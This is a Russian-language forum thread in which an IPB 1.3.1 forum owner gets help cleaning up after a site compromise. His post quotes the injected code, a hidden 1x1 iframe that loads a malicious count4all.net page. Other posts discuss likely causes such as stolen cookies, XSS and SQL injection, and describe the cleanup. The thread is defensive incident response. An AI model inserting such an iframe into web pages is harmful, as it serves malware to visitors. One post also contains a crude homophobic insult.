Перейти к контенту
  • 0

проломали форум


Вопрос

:D

 

Каким-то образом поломали форум www.velomax.lviv.ua/forum (IPB v1.3.1 final)

 

При попытке зайти антивирус даёт сообщение о наличии трояна, затем експлорер выдает сообщение об ошибке и захлопывается.

В код вставлена строчка с перенаправлением на некую вредоносную страничку.

Изменено содержание файла conf_global.php у хостера - исправлен е-мейл администратора (возможно и ещё что-то).

Изменен пароль администратора.

 

Суппорт хостера отмалчивается и не берёт трубку.

 

Вот, что я спрашивал у хостера:

1) каким образом взлом мог произойти, чтобы не допустить такого в дальнейшем?

2) если поставить бэкап, то вернется ли все на свои места?

Ничего мне они не ответили - фактически, бросили в трудную минуту. А я третий год у них хостился.

Вот эти вот кросавчеги:

 

http://hostpro.com.ua

 

Я предположил, что либо посторонние узнали пароль от ФТП и панели управления сайтом, либо в движке инвижина есть дырка, которую я профтыкал.

Оценивая своё знание движка на тройку, хотел бы услышать ваши мнения.

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0
Вот, что я спрашивал у хостера:

1) каким образом взлом мог произойти, чтобы не допустить такого в дальнейшем?

2) если поставить бэкап, то вернется ли все на свои места?

Ничего мне они не ответили - фактически, бросили в трудную минуту. А я третий год у них хостился.

Вот эти вот кросавчеги:

 

http://hostpro.com.ua

знаком с хостером этим неплохо, вроди неплохие ребята, странно что тех. поддержка так себя ведет в таких ситуациях ведь при взломе сайта/форума и их сервер под угрозой

 

Я предположил, что либо посторонние узнали пароль от ФТП и панели управления сайтом, либо в движке инвижина есть дырка, которую я профтыкал.

Оценивая своё знание движка на тройку, хотел бы услышать ваши мнения.

так вроди всем известно что ранние версии форумов все взламываются для того и работают в IPB усовершенствуя форум для защиты от хакеров, просто переходите на последнюю версию и все, правда есть хитрый способ как и последнюю можно взломать, но после одного взлома вы будете уже знать как это не допускать и плюс бекап восстановит все, а вот в ранних версиях на сколько мне известно только переход на новую версию помочь может

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Очень плохо себя ведет их поддержка.

Первый кросавчег стал уверять меня, что с форумом все нормально. Это не удивительно - я звонил туда в пятницу, в конце дня :D

Со вторым кросавчегом мы проговорили по межгороду минут сорок - в трубку было слышно, как он деловито щелкал по клавишам - искал бэкап. (Это было уже на другой день.) Пока его не нашли.

По-моему так, как они себя ведут, поступают только представители пассивной части сексуальных меньшинств...

 

Хотел бы услышать какие-то более конкретные предложения. Общих фраз и завуалированных намеков на хитрые способы не надо.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Насчёт пасса к ФТП - попроси логи кто когда с какого ip был.

Насчёт уязвимостей - вроде бы где-то здесь заплатки были.. поставь.

А новые для нашей старенькой 1.3 хацкерам уже трудней найти =)

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Искал, еще позавчера искал, куда эту вредоносную строчку прописали - так и не нашел. Удивлялся.

Заплатки в версии 1.3.1 все установлены сразу - я так считал. Или я ошибаюсь ?

 

И главное - не могу определить причину: каким образом произошел взлом - дырка в движке или посторонние завладели паролем ?

 

Вот фрагмент кода:

<!--TEMPLATE: skin_boards, Template Part: PageTop-->
<div align='left' style='text-align:left;padding-bottom:4px'>
	<!-- IBF.NEWSLINK -->Крайній раз Ви тут були  сьогодні, у  00:55
</div>
<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe><!--TEMPLATE: skin_boards, Template Part: CatHeader_Expanded-->
<div class="tableborder">
  <div class='maintitle' align='left'><img src='style_images/1/nav_m.gif' border='0'  alt='>' width='8' height='8' /> <a href="http://velomax.lviv.ua/forum/index.php?c=1">Поїзденьки</a></div>
  <table width="100%" border="0" cellspacing="1" cellpadding="4">
	<tr> 
	  <th align="center" width="2%" class='titlemedium'><img src="style_images/1/spacer.gif" alt="" width="28" height="1" /></th>
	  <th align="left" width="59%" class='titlemedium'>Форум</th>
	  <th align="center" width="7%" class='titlemedium'>Тем</th>
	  <th align="center" width="7%" class='titlemedium'>Відповідей</th>
	  <th align="left" width="25%" class='titlemedium'>Поновлення</th>
	</tr>
<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe><!--TEMPLATE: skin_boards, Template Part: ForumRow-->
	<tr>

 

В пятой строчке вписан какой-то левак. Каким образом - не могу понять.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
так вроди всем известно что ранние версии форумов все взламываются для того и работают в IPB усовершенствуя форум для защиты от хакеров, просто переходите на последнюю версию и все, правда есть хитрый способ как и последнюю можно взломать, но после одного взлома вы будете уже знать как это не допускать и плюс бекап восстановит все, а вот в ранних версиях на сколько мне известно только переход на новую версию помочь может

бред. Раниие версии ещё и позащищённей будут.

 

 

Заплатки в версии 1.3.1 все установлены сразу - я так считал.

:D ну считай так дальше.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

До сих пор вирус на месте, хотя техподдержка сказала, что они восстановили бэкап.

 

Как втулили строчку:

<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe> ?

 

Я смотрел содержимое skin_boards.php - там чисто. Кроме того, когда я заходил по ФТП, было видно по дате изменения, что недавно менялся только файл conf_global.php, а все остальные файлы были не тронуты.

Это значит, что вредную строчку записали в какую-то таблицу базы данных?

 

Song, это грустная шутка, потому что вероятность кражи пароля у меня чрезвычайно мала. Пароли менялись раз в квартал, были длинными и состояли из каких-то случайных букв-цифр в разных регистрах. В инет я заходил только с одной машины из дому. В прошлом месяце всего два раза заходил с работы, но ставил птичку, что захожу с чужой машины. Разве что там стоял кейлоггер?

Те уязвимости, которые описаны у тебя на сайте - их надо закрывать самому или они уже закрыты в версии 1.3.1 ?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Как втулили строчку:

<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe> ?

Да какая разница как. Тем более откуда мы знаем, как тебе ее засунули :D

Song, это грустная шутка, потому что вероятность кражи пароля у меня чрезвычайно мала.

Если она мала, как же тебя сломали?

 

Ставь все, что стоит написано здесь http://www.sysman.ru/index.php?showforum=108 и надеюсь, больше у тебя такое не повторится.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Конечно есть разница. Если знать, как эту строчку вписали, то можно догадаться, откуда её убирать. Я не догадался пока, а она там сидит и всё портит.

Кроме того, ставить исправления надо на чистый форум, а не на зараженый.

А вопрос с кражей пароля или с дырой в коде очень важный, потому что надо определиться, как же все-таки это произошло. Все эти вопросы надо бы задавать хостеру, но он толком не может ничего сказать. Поэтому спрашиваю здесь.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
бред. Раниие версии ещё и позащищённей будут.

вроди везде только и слышно что начальные версии взламываются, это может если с заплатками то защищеннее, но их мало кто догадается сразу ставить а в новых версиях они уже явно встроены, поэтому не вижу никакого бреда

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Элементарно поставив доп защиту .htaccess на админку можно всего этого избежать.

 

У тебя могли свистнуть куки и все...

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Каким образом?

в журнале "хакер" описывается один способ, через жалобу тебе посылается спец код если отвечаешь то куки оказываются у хакера

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Саппорт сказал, что восстановить бэкап невозможно, предложил стереть всю базу данных (за два года) и проинсталлировать форум заново.

:D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
разочаровался в этом хостинге, а вашу проблему может помочь исправить переход на платную версию и апргейд форума до последней версии
Ссылка на комментарий
Поделиться на других сайтах

  • 0
вроди везде только и слышно что начальные версии взламываются,

Где? Ломают только у тех, кто не может поставить элементарно простые заплатки и руки растут из общеизвестного места.

 

Мой форум с 2003 года ломали только 2 раза, 1-й раз был через еще тогда неизвестную дырку, второй - не скажу как :D Больше никто ничего сделать не смог. По этому нужно с умом подходить к делу этому, если проект серьезный.

Изменено пользователем Jax
Ссылка на комментарий
Поделиться на других сайтах

  • 0

Я предупреждал об этом в первом постинге.

Поскольку возможность кражи пароля в явном виде очень мала, посоветовавшись с группой товарищей, пока что сошлись на предположении, что каким-то образом украли куки.

Затем посторонними была проведена мультимодерация.

В базе данных оказались повреждены таблицы velomax_templates и velomax_skin_templates в 17 местах.

Исправлено ручками, сейчас все работает.

В данный момент восстанавливаем доступ и ставим заплатки с форума Сонга.

Jax, напиши пожалуйста в приват про второй случай.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Саппорт сказал, что восстановить бэкап невозможно, предложил стереть всю базу данных (за два года) и проинсталлировать форум заново.

lol :D

В БД через поиск найди этот

<iframe src='http://count4all.net/adv/149/new3.php' width=1 height=1></iframe> да сотри.

Ставь заплатки, забей на бек-ап. Форум то цел, как я понимаю.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Так и было сделано. Просто я не сразу догадался об этом, дело в том, что у меня немного другая специальность.
Ссылка на комментарий
Поделиться на других сайтах

  • 0

>> Те уязвимости, которые описаны у тебя на сайте - их надо закрывать самому или они уже закрыты в версии 1.3.1 ?

 

Прочитай правила раздела там где исправления. Там есть ответ на твой вопрос.

 

>> вроди везде только и слышно что начальные версии взламываются, это может если с заплатками то защищеннее, но их мало кто догадается сразу ставить а в новых версиях они уже явно встроены, поэтому не вижу никакого бреда

 

От кого ты слышал?

Давай ссылки, явки, пароли :D

На самом деле это бред, это я тебе говорю как разработчик.

А ты, если не отвечаешь за свои слова, так лучше как в рекламе: "Иногда лучше жевать.."

Понятно, что без заплаток они не защищённые, так это правило распространяется хоть на 1.2 хоть на 2.1.6

все они без заплаток незащищённые.

Только разница в том, что в в 1.х там уже поле исчерпано для их поиска, а в 2.х с учётом того, что появился вагон нового кода вероятность найти новую уязвимость - очень большая.

Доказательством тому текущий слойт, который закрыли вот только что, 2 дня назад.

 

 

Каким образом?

Любой новой уязвимостью, которая появилась после выхода 1.3.1

Их достаточно много было. Это SQL-inj.

А уж про XSS, через которую у тебя могли утащить куки снифером, я уж вообще молчу, это вообще стандартная для взломов ситуация.

 

P.S. Почему-то все понаставят форумов и думают, что теперь они боги и их всё обойдёт стороной и программа их спасёт.

РАБОТАТЬ надо, работать, чтобы дело всегда приносило доход и удовольствие. Вот так.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Ознакомился со списком заплаток, переписал всё, проверил код форума. Оказалось, что часть исправлений уже была внесена, но половину примерно пришлось сделать. (Постинг о пробелах и табуляторах вышел как раз, когда я сообразил, что их наличие или отсутствие надо учитывать :D)

Когда я "понаставил" этот форум, тут было описано всего три его уязвимости и все они были у меня закрыты.

Теперь буду время от времени заглядывать к Сонгу в гости - не пополнился ли список.

 

И еще: можно как-то доступно рассказать про ХСС и SQL-inj, чтобы избежать подобных сбоев в дальнейшем?

Кроме того, есть еще вопрос: у меня записан айпи кросавчега, который накуролесил в базе. Еще у нескольких участников форума подобный айпи - отличается только последнее число. А воис сказал, что это айпи какой-то американской фирмы. Этот момент как-то можно прояснить?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
От кого ты слышал?

Давай ссылки, явки, пароли :D

На самом деле это бред, это я тебе говорю как разработчик.

А ты, если не отвечаешь за свои слова, так лучше как в рекламе: "Иногда

лучше жевать.."

просто у нас год назад взломавали форум, нам советовали переходить на последнюю версию что помогло бы избежать взломов, про заплатки почему-то и речи не ишло, вот от тудава и слышал, ну и просто по логике думал что для того и усовершенствуют форум чтобы покупали и переходили на последнюю версию дабы избежать взломов, даже не мог и представить что разработчики будут убеждать клиентов что это полный бред, однако нам переход на платную последнюю версию помог избежать дальнейших взломов, что повторно убедило меня в том что последние версии защищены, но спасибо что вразумили бегу срочно за заплатками.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

>> Постинг о пробелах и табуляторах вышел как раз, когда я сообразил, что их наличие или отсутствие надо учитывать

ну вот видишь как я его к месту написал :D

 

>> Кроме того, есть еще вопрос: у меня записан айпи кросавчега, который накуролесил в базе. Еще у нескольких участников форума подобный айпи - отличается только последнее число. А воис сказал, что это айпи какой-то американской фирмы. Этот момент как-то можно прояснить?

 

Вполне возможно это один из них.

Понаблюдай кто из них отличается к тебе особенной ненавистью.

 

>> Теперь буду время от времени заглядывать к Сонгу в гости - не пополнился ли список.

Можешь просто подписаться на раздел.

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.